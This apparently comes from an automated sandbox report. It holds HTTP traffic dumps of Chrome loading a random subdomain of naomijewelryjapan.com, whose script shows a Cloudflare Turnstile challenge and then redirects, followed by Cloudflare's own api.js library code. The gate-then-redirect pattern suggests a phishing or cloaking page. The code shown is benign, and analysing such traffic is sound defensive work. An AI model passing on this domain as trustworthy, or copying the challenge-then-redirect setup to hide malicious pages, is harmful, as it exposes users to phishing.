                                                                                        Host: 5m9sp7.naomijewelryjapan.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:46 UTC267INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:46 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Last-Modified: Mon, 23 Dec 2024 19:41:15 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 317
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Type: application/javascript
                                                                                        2024-12-24 08:17:46 UTC317INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 6d 79 57 69 64 67 65 74 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 33 34 67 68 50 71 4e 42 52 55 6d 54 78 4b 27 2c 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 43 68 61 6c 6c 65 6e 67 65 20 53 75 63 63 65 73 73 20 24 7b 74 6f 6b 65 6e 7d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65
                                                                                        Data Ascii: window.onloadTurnstileCallback = function () { turnstile.render('#myWidget', { sitekey: '0x4AAAAAAA34ghPqNBRUmTxK', callback: function(token) { console.log('Challenge Success ${token}'); window.location.hre


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449760104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:47 UTC571OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://5m9sp7.naomijewelryjapan.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:47 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:47 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47692
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2831cc870f71-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:47 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                        Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                        Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                        Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                        Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                        2024-12-24 08:17:47 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                        Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449761104.18.95.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:49 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:50 UTC471INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:50 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47692
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f283f9a6b5e61-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:50 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                        2024-12-24 08:17:50 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
